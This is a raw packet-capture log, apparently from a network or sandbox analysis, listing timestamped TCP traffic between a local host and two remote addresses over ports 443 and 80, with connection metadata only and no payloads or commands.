Oct 25, 2024 19:51:33.127760887 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.127779961 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.131170988 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.131197929 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.131248951 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.131258011 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.131287098 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.135580063 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.135598898 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.135643005 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.135653019 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.135662079 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.135662079 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.138520956 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.138542891 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.138590097 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.138597965 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.138607979 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.142153978 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.142172098 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.142231941 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.142242908 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.142251968 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.144886017 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.144910097 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.144947052 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.144954920 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.144963980 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.149694920 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.149714947 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.149749994 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.149756908 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.149769068 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.151972055 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.151997089 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.152029037 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.152036905 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.152046919 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.156047106 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.156065941 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.156105042 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.156111956 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.156121969 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.157746077 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.157780886 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.157808065 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.157814026 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.157824993 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.161676884 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.161698103 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.161737919 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.161744118 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.161752939 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.164855003 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.164880037 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.164920092 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.164930105 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.164938927 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.164973021 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.167603970 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.167624950 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.167666912 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.167675018 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.167685032 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.170109987 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.170140982 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.170167923 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.170176029 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.170186043 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.170216084 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.173953056 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.173975945 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.174022913 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.174031973 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.174042940 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.174042940 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.176306009 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.176330090 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.176358938 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.176368952 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.176378012 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.176722050 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.179039001 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.179064035 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.179111004 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.179122925 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.179141998 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.181816101 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.181840897 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.181875944 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.181885004 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.181893110 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.184689999 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.184710026 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.184748888 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.184757948 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.184767008 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.185137987 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.187210083 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.187235117 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.187269926 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.187278032 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.187303066 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.187303066 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.190623045 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.190648079 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.190681934 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.190691948 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.190701962 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.192178011 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.192199945 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.192231894 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.192240953 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.192250967 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.192368984 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.195411921 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.195455074 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.195473909 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.195485115 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.195492983 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.195498943 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.195904016 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:33.195936918 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:33.195987940 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:43.958686113 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:43.964407921 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:43.964498043 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:43.964687109 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:43.970590115 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.704380035 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.704396963 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.704408884 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.704454899 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.704467058 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.704479933 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.704489946 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.704619884 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:45.774933100 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.774949074 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.774966955 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.775042057 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.775053978 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.775054932 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:45.775132895 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:45.821527958 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.821543932 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.821563005 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.821574926 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.821588039 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.821619987 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:45.821620941 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:45.822021008 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.822504044 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.822562933 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:45.822691917 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.891936064 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.891956091 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.892020941 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.892064095 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:45.892148018 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.892159939 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.892200947 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:45.939269066 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.939289093 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.939301014 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.939323902 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.939337015 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:45.939455032 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:46.434848070 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.435002089 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.435014009 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.435025930 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.435103893 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:46.435177088 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.435364008 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.435378075 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.435414076 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:46.435532093 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.435544014 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.435554981 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.435571909 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.435584068 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.435585022 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:46.435595036 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.435609102 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:46.435635090 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:46.435714960 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.435726881 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.435762882 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:46.436230898 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.436248064 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.436259985 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.436273098 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.436274052 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:46.436285973 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.436295033 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:46.436297894 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.436320066 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.436323881 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:46.436323881 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.436328888 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.436338902 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.436351061 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.436363935 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.436371088 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:46.436384916 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:46.450747967 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.450762033 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.450797081 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.450814009 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:46.450843096 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:46.474272013 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.474298954 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.474311113 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.474323988 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.474359989 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:46.474456072 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.474509001 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:46.474601984 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.474613905 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.474651098 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:46.498538017 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.498555899 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.498569965 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.498661041 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:46.544652939 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.750663996 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:46.872694969 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.872724056 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.872734070 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.872756004 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:46.872814894 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.009145975 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.009186029 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.009293079 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.009299040 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.009311914 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.009334087 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.009344101 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.009362936 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.010951042 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.010966063 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.010997057 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.079829931 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.079859018 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.079870939 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.079890966 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.079965115 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.080166101 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.080215931 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.126708984 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.126738071 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.126749992 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.126764059 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.126786947 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.126825094 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.126853943 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.126921892 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.126940966 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.126954079 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.126961946 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.126991034 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.127665997 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.197180986 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.197268963 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.197331905 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.197343111 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.197355032 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.197369099 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.197397947 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.197415113 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.528525114 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.528902054 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.529042006 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.670423985 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.670474052 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.670511961 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.670567036 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.670578957 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.670603037 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.670665979 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.741152048 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.741193056 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.741230011 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.741266012 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.741302967 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.741352081 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.741503954 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.741539001 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.741578102 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.741605997 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.741787910 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.787154913 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.787302017 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.787348032 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.787400007 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.787415981 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.787434101 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.787451982 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.811832905 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.811877966 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.811922073 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.811939001 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.811996937 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.858177900 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.858222961 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.858278036 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.858314991 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.858333111 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.858350992 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.858386040 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:47.858391047 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.858412981 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:47.858453035 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:48.187087059 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:48.187104940 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:48.187114954 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:48.187125921 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:48.187136889 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:48.187160015 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:48.187349081 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:48.187675953 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:48.187711000 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:48.187745094 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:48.187760115 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:48.187815905 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:48.188168049 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:48.325395107 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:48.325500965 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:48.325527906 CEST	49175	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:48.325539112 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:48.325572968 CEST	80	49175	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:48.325608969 CEST	80	49175	192.3.176.141	192.168.2.22
